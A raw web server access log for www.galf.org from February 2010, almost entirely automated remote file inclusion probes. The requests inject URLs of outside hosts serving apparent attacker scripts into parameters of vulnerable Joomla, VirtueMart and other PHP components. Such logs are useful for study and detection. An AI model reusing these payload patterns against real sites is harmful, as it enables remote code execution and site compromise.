85.112.126.5 - - [14/Feb/2010:16:03:37 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:03:45 -0800] "GET /logs/access_090907.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [14/Feb/2010:16:04:09 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [14/Feb/2010:16:04:09 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [14/Feb/2010:16:04:09 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:05:24 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:05:36 -0800] "GET /logs/access_090907.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.198.61 - - [14/Feb/2010:16:06:31 -0800] "GET /logs/access.log%20%20/error.php?dir=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.198.61 - - [14/Feb/2010:16:06:31 -0800] "GET /logs/error.php?dir=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.198.61 - - [14/Feb/2010:16:06:34 -0800] "GET /error.php?dir=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:06:40 -0800] "GET /logs/access_090817.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:06:40 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:06:40 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
124.217.198.61 - - [14/Feb/2010:16:06:57 -0800] "GET /error.php?dir=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.204.183 - - [14/Feb/2010:16:06:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
124.217.198.61 - - [14/Feb/2010:16:06:59 -0800] "GET /logs/error.php?dir=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.198.61 - - [14/Feb/2010:16:06:59 -0800] "GET /logs/access.log%20%20/error.php?dir=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:07:18 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:07:27 -0800] "GET /logs/access_100125.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:07:27 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:07:28 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:07:43 -0800] "GET /logs/access_090824.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:07:44 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:07:44 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:07:52 -0800] "GET /logs/access_090817.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:08:31 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:08:33 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:08:35 -0800] "GET /logs/access_090907.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:08:40 -0800] "GET /logs/access_090824.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:08:59 -0800] "GET /logs/access_090921.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:08:59 -0800] "GET /logs/access_090907.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:16:09:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:16:09:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:16:09:13 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:10:00 -0800] "GET /logs/access_090817.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:10:00 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:10:00 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:16:10:17 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:10:54 -0800] "GET /logs/access_090824.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:11:24 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:11:24 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:11:49 -0800] "GET /?sourcedir=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:11:49 -0800] "GET /logs/?sourcedir=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:11:58 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:12:53 -0800] "GET /logs/access_100104.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:12:53 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:12:53 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:12:59 -0800] "GET /logs/access_090817.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:12:59 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:12:59 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:13:00 -0800] "GET /logs/access_091221.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
77.88.25.28 - - [14/Feb/2010:16:13:25 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:13:31 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.216.73 - - [14/Feb/2010:16:14:04 -0800] "GET /logs/access_090817.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "www.galf.org"
112.78.112.81 - - [14/Feb/2010:16:14:22 -0800] "GET /logs/access_091228.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
112.78.112.81 - - [14/Feb/2010:16:14:32 -0800] "GET /logs/access_100201.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:17:05 -0800] "GET /logs/access_100104.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:17:05 -0800] "GET /cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:17:06 -0800] "GET /logs//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
218.38.136.126 - - [14/Feb/2010:16:17:17 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [14/Feb/2010:16:17:17 -0800] "GET /logs/access_091228.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [14/Feb/2010:16:17:17 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [14/Feb/2010:16:18:13 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:16:18:53 -0800] "GET /logs/access_090817.log//cropcanvas.php?cropimagedir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:27 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:27 -0800] "GET /logs/access_100125.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:27 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:29 -0800] "GET /logs/access_100125.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:29 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:29 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:30 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:30 -0800] "GET /logs/access_100125.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:21:30 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.234.78.219 - - [14/Feb/2010:16:24:09 -0800] "GET /delete_comment.php?board_skin_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
60.234.78.219 - - [14/Feb/2010:16:24:09 -0800] "GET /logs//delete_comment.php?board_skin_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
60.234.78.219 - - [14/Feb/2010:16:24:09 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.191.4 - - [14/Feb/2010:16:24:48 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:24:48 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:24:48 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:24:51 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:24:51 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:24:51 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:25:08 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:25:08 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:25:08 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:25:08 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:25:08 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:25:08 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:25:24 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:25:24 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:25:29 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:25:29 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:25:33 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:25:34 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:25:45 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:25:45 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:25:45 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:25:55 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:26:19 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:26:19 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:26:19 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:26:30 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:27:17 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:27:17 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:27:17 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:16:27:25 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:27:54 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:28:34 -0800] "GET /logs/access_100118.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:06 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:06 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:06 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:24 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:24 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:24 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:41 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:41 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:41 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:50 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:29:50 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [14/Feb/2010:16:32:37 -0800] "GET /logs/access_100125.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:32:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:32:46 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:32:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:32:47 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:33:03 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:33:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:33:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [14/Feb/2010:16:33:23 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
